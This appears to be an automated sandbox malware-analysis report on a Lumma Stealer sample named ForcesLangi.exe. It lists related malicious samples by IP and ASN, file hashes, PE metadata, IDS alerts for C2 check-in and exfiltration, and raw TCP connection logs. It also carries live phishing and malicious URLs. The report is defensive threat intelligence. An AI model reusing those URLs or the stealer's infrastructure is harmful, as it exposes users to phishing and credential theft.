 | Setup.exe | malicious | Unknown | 104.121.10.34
 | Setup.exe | malicious | Unknown | 23.55.153.106
 | Vq50tK1Nx2.exe | malicious | LummaC | 104.121.10.34
 | IzDjbVdHha.exe | malicious | LummaC | 104.121.10.34
 | T4qO1i2Jav.exe | malicious | LummaC Stealer | 23.55.153.106
 | FXdg37pY22.exe | malicious | LummaC Stealer | 23.55.153.106
 | FXdg37pY22.exe | malicious | LummaC Stealer | 23.55.153.106
                                                                                                                                                                                                                                            k0ukcEH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: AKAMAI-ASUS
  Leside-.exe | malicious | LummaC | 92.122.104.90
  Setup.exe | malicious | Unknown | 104.121.10.34
  Vq50tK1Nx2.exe | malicious | LummaC | 104.121.10.34
  IzDjbVdHha.exe | malicious | LummaC | 104.121.10.34
  JA7cOAGHym.exe | malicious | Vidar | 23.57.90.162
  grand-theft-auto-5-theme-1-installer_qb8W-j1.exe | malicious | Unknown | 95.100.135.104
  db0fa4b8db0333367e9bda3ab68b8042.m68k.elf | malicious | Mirai, Gafgyt | 104.73.204.126
  db0fa4b8db0333367e9bda3ab68b8042.spc.elf | malicious | Mirai, Gafgyt | 104.120.124.62
  pVbAZEFIpI.exe | malicious | LummaC | 104.102.49.254
  GxX48twWHA.exe | malicious | LummaC | 104.102.49.254

Match: CLOUDFLARENETUS
  iviewers.dll | malicious | LummaC | 104.21.60.24
  http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h | malicious | HTMLPhisher | 104.17.25.14
  launcher.exe | malicious | LummaC | 104.21.58.80
  Leside-.exe | malicious | LummaC | 104.21.66.86
  solara-executor.exe | malicious | Unknown | 172.67.75.163
  Setup.exe | malicious | Unknown | 104.21.2.114
  Setup.exe | malicious | Unknown | 104.21.2.114
  http://proxyium.com | malicious | Unknown | 104.21.80.92
  https://cbhc9.anguatiab.ru/RpweC/ | malicious | Unknown | 1.1.1.1
  setup.msi | malicious | Unknown | 172.67.148.171
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: a0e9f5d64349fb13191bc781f81f42e1
  iviewers.dll | malicious | LummaC | 104.21.66.86, 92.122.104.90
  launcher.exe | malicious | LummaC | 104.21.66.86, 92.122.104.90
  Leside-.exe | malicious | LummaC | 104.21.66.86, 92.122.104.90
  search.hta | malicious | Unknown | 104.21.66.86, 92.122.104.90
  SET_UP.exe | malicious | LummaC | 104.21.66.86, 92.122.104.90
  !Setup.exe | malicious | LummaC Stealer | 104.21.66.86, 92.122.104.90
  @Setup.exe | malicious | LummaC | 104.21.66.86, 92.122.104.90
  Full_Setup.exe | malicious | LummaC Stealer | 104.21.66.86, 92.122.104.90
  Solara.exe | malicious | LummaC | 104.21.66.86, 92.122.104.90
  0x001f00000004676d-1858.exe | malicious | LummaC | 104.21.66.86, 92.122.104.90
No context

Process: C:\Users\user\Desktop\ForcesLangi.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 42
Entropy (8bit): 4.0050635535766075
Encrypted: false
SSDEEP: 3:QHXMKa/xwwUy:Q3La/xwQ
MD5: 84CFDB4B995B1DBF543B26B86C863ADC
SHA1: D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256: D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512: 485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..

Process: C:\Users\user\Desktop\ForcesLangi.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 649728
Entropy (8bit): 7.115011073807816
Encrypted: false
SSDEEP: 12288:YSqig5JxL8kZIOWhbN4ddlannT5EbJ+vMvb4Yw8kU0khq7:YfighL8ekmd+Tie
MD5: C69855DE2EA93BB19E8B3D9071A586FC
SHA1: 83612032AF6F152C528D1117B7CF26EDED1EB853
SHA-256: C0A41EAEC5F6C397EADDECF77D9E29AAEC4116776122549F634D64061E631001
SHA-512: 5AC19AA55945A4A6BFC3BECABAEF515182D35C0AC99C40E7062427AF7EB0AE1CF7D650C622133FE66FBC32EF7A8A7652A10A99CAE121F02B5850D5D4860FE3C8
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........b.....................A..................{w....................................................Rich...........................PE..L.....ng...........!.........j............................................... ............@.............................|...<...P................................*..\...............................x...@...............T............................text.............................. ..`.rdata...e.......f..................@..@.data...............................@....reloc...*.......,..................@..B................................................................................................................................................................................................................................................................................................................................
File type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.10860840065778
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: ForcesLangi.exe
File size: 661'504 bytes
MD5: 64f1abe3f2f65e545c54b23809c06583
SHA1: 8c32e992999dd0bf57cc45fed77c858cb4768a09
SHA256: 05617db5aed9685ac891f4a7539294603640443b4ca5534abac163a544c574fa
SHA512: f2295e25a1496aa4f3fbb29e88cfca8d549dc1b51bd779f61dbe752c663120698e35e0a2681234bd66f069470787da7d7796c3d78fe4cec7ed67a846e676972b
SSDEEP: 12288:au0ja8+4WHQB7y9trkcVyiBFAMyhZVUEz4Pjt/ax7s2:au028tPQkcVy+yhZVUEz4PAx7
TLSH: CFE44A1F577BF609E04A0030A59A367B9DF4EF56E107C8F20AC4E6676066861DFECE12
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x404072
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x676E97A0 [Fri Dec 27 12:03:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
jnl 00007FB0A4E07202h
cmp cl, dl
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4020 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa4000 | 0x664 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa6000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa0a78 | 0xa0c00 | ea25bcb094238ae30bcddf71b94c0371 | False | 0.46740286012830484 | data | 7.114943161114869 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xa4000 | 0x664 | 0x800 | eb46fcabb49670b1a45623af347b691c | False | 0.353515625 | data | 3.6082379532908373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xa6000 | 0xc | 0x200 | b8621a767d2dd3d37ce617bafd19944b | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xa4090 | 0x3d4 | data | | | 0.42448979591836733
RT_MANIFEST | 0xa4474 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-27T22:37:59.411853+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 92.122.104.90 | 443 | TCP
2024-12-27T22:38:00.287622+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.4 | 49730 | 92.122.104.90 | 443 | TCP
2024-12-27T22:38:01.942440+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 104.21.66.86 | 443 | TCP
2024-12-27T22:38:02.668693+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49731 | 104.21.66.86 | 443 | TCP
2024-12-27T22:38:02.668693+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49731 | 104.21.66.86 | 443 | TCP
2024-12-27T22:38:03.936184+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49732 | 104.21.66.86 | 443 | TCP
2024-12-27T22:38:04.707649+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49732 | 104.21.66.86 | 443 | TCP
2024-12-27T22:38:04.707649+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49732 | 104.21.66.86 | 443 | TCP
2024-12-27T22:38:06.368262+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 104.21.66.86 | 443 | TCP
2024-12-27T22:38:08.761026+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49734 | 104.21.66.86 | 443 | TCP
2024-12-27T22:38:13.131035+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49735 | 104.21.66.86 | 443 | TCP
2024-12-27T22:38:15.715385+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 104.21.66.86 | 443 | TCP
2024-12-27T22:38:17.788574+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49739 | 104.21.66.86 | 443 | TCP
2024-12-27T22:38:19.549492+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49739 | 104.21.66.86 | 443 | TCP
2024-12-27T22:38:20.418310+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 104.21.66.86 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 22:37:57.929203033 CET | 49730 | 443 | 192.168.2.4 | 92.122.104.90
Dec 27, 2024 22:37:57.929245949 CET | 443 | 49730 | 92.122.104.90 | 192.168.2.4
Dec 27, 2024 22:37:57.929311991 CET | 49730 | 443 | 192.168.2.4 | 92.122.104.90
Dec 27, 2024 22:37:57.932009935 CET | 49730 | 443 | 192.168.2.4 | 92.122.104.90
Dec 27, 2024 22:37:57.932027102 CET | 443 | 49730 | 92.122.104.90 | 192.168.2.4
Dec 27, 2024 22:37:59.411772013 CET | 443 | 49730 | 92.122.104.90 | 192.168.2.4
Dec 27, 2024 22:37:59.411853075 CET | 49730 | 443 | 192.168.2.4 | 92.122.104.90
Dec 27, 2024 22:37:59.413949966 CET | 49730 | 443 | 192.168.2.4 | 92.122.104.90
Dec 27, 2024 22:37:59.413965940 CET | 443 | 49730 | 92.122.104.90 | 192.168.2.4
Dec 27, 2024 22:37:59.414174080 CET | 443 | 49730 | 92.122.104.90 | 192.168.2.4
Dec 27, 2024 22:37:59.453834057 CET | 49730 | 443 | 192.168.2.4 | 92.122.104.90
Dec 27, 2024 22:37:59.457803011 CET | 49730 | 443 | 192.168.2.4 | 92.122.104.90
Dec 27, 2024 22:37:59.503334045 CET | 443 | 49730 | 92.122.104.90 | 192.168.2.4
Dec 27, 2024 22:38:00.287662029 CET | 443 | 49730 | 92.122.104.90 | 192.168.2.4
Dec 27, 2024 22:38:00.287688017 CET | 443 | 49730 | 92.122.104.90 | 192.168.2.4
Dec 27, 2024 22:38:00.287695885 CET | 443 | 49730 | 92.122.104.90 | 192.168.2.4
Dec 27, 2024 22:38:00.287708998 CET | 443 | 49730 | 92.122.104.90 | 192.168.2.4
Dec 27, 2024 22:38:00.287715912 CET | 443 | 49730 | 92.122.104.90 | 192.168.2.4
Dec 27, 2024 22:38:00.287739038 CET | 49730 | 443 | 192.168.2.4 | 92.122.104.90
Dec 27, 2024 22:38:00.287756920 CET | 443 | 49730 | 92.122.104.90 | 192.168.2.4
Dec 27, 2024 22:38:00.287792921 CET | 49730 | 443 | 192.168.2.4 | 92.122.104.90
Dec 27, 2024 22:38:00.287826061 CET | 49730 | 443 | 192.168.2.4 | 92.122.104.90
Dec 27, 2024 22:38:00.475646973 CET | 443 | 49730 | 92.122.104.90 | 192.168.2.4
Dec 27, 2024 22:38:00.475701094 CET | 443 | 49730 | 92.122.104.90 | 192.168.2.4
Dec 27, 2024 22:38:00.475739002 CET | 49730 | 443 | 192.168.2.4 | 92.122.104.90
Dec 27, 2024 22:38:00.475750923 CET | 443 | 49730 | 92.122.104.90 | 192.168.2.4
Dec 27, 2024 22:38:00.475795031 CET | 49730 | 443 | 192.168.2.4 | 92.122.104.90
Dec 27, 2024 22:38:00.506249905 CET | 443 | 49730 | 92.122.104.90 | 192.168.2.4
Dec 27, 2024 22:38:00.506282091 CET | 443 | 49730 | 92.122.104.90 | 192.168.2.4
Dec 27, 2024 22:38:00.506315947 CET | 49730 | 443 | 192.168.2.4 | 92.122.104.90
Dec 27, 2024 22:38:00.506316900 CET | 443 | 49730 | 92.122.104.90 | 192.168.2.4
Dec 27, 2024 22:38:00.506366014 CET | 49730 | 443 | 192.168.2.4 | 92.122.104.90
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.569051027 CET49730443192.168.2.492.122.104.90
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.569077969 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.569108963 CET49730443192.168.2.492.122.104.90
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.569114923 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.718358040 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.718403101 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.718480110 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.718734026 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.718744993 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:01.942296982 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:01.942440033 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:01.944856882 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:01.944864988 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:01.945067883 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:01.946146011 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:01.946240902 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:01.946269035 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.668481112 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.668576956 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.668628931 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.668796062 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.668814898 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.668823957 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.668828011 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.677100897 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.677155018 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.677242041 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.677532911 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.677548885 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:03.936075926 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:03.936183929 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:03.937254906 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:03.937262058 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:03.937484980 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:03.938571930 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:03.938571930 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:03.938635111 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.707665920 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.707729101 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.707765102 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.707766056 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.707783937 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.707822084 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.707824945 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.707835913 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.707878113 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.707895994 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.715956926 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.716041088 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.716049910 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.724258900 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.724312067 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.724334002 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.766494989 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.827213049 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.875703096 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.875725985 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912435055 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912470102 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912511110 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912520885 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912564993 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912568092 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912616968 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912947893 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912964106 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912976027 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912981987 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:05.061811924 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:05.061860085 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:05.061933994 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:05.062256098 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:05.062271118 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:06.368194103 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:06.368262053 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:06.369616032 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:06.369627953 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:06.369851112 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:06.371002913 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:06.371134043 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:06.371166945 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:06.371220112 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:06.371227026 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:07.362896919 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:07.362994909 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:07.363049030 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:07.363189936 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:07.363210917 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:07.488120079 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:07.488161087 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:07.488226891 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:07.488491058 CET49734443192.168.2.4104.21.66.86
Dec 27, 2024 22:38:07.488500118 CET | 443         | 49734     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:08.760945082 CET | 443         | 49734     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:08.761025906 CET | 49734       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:08.762104034 CET | 49734       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:08.762124062 CET | 443         | 49734     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:08.762321949 CET | 443         | 49734     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:08.763387918 CET | 49734       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:08.763483047 CET | 49734       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:08.763523102 CET | 443         | 49734     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:11.697133064 CET | 443         | 49734     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:11.697240114 CET | 443         | 49734     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:11.697293997 CET | 49734       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:11.697439909 CET | 49734       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:11.697458029 CET | 443         | 49734     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:11.916023970 CET | 49735       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:11.916074038 CET | 443         | 49735     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:11.916150093 CET | 49735       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:11.916414022 CET | 49735       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:11.916428089 CET | 443         | 49735     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:13.130877972 CET | 443         | 49735     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:13.131035089 CET | 49735       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:13.131947041 CET | 49735       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:13.131953955 CET | 443         | 49735     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:13.132189035 CET | 443         | 49735     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:13.133160114 CET | 49735       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:13.133256912 CET | 49735       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:13.133275032 CET | 443         | 49735     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:13.133322001 CET | 49735       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:13.133328915 CET | 443         | 49735     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:14.066726923 CET | 443         | 49735     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:14.066814899 CET | 443         | 49735     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:14.066941977 CET | 49735       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:14.067012072 CET | 49735       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:14.067028999 CET | 443         | 49735     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:14.455641985 CET | 49737       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:14.455760002 CET | 443         | 49737     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:14.455837965 CET | 49737       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:14.456109047 CET | 49737       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:14.456144094 CET | 443         | 49737     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:15.715284109 CET | 443         | 49737     | 104.21.66.86 | 192.168.2.4
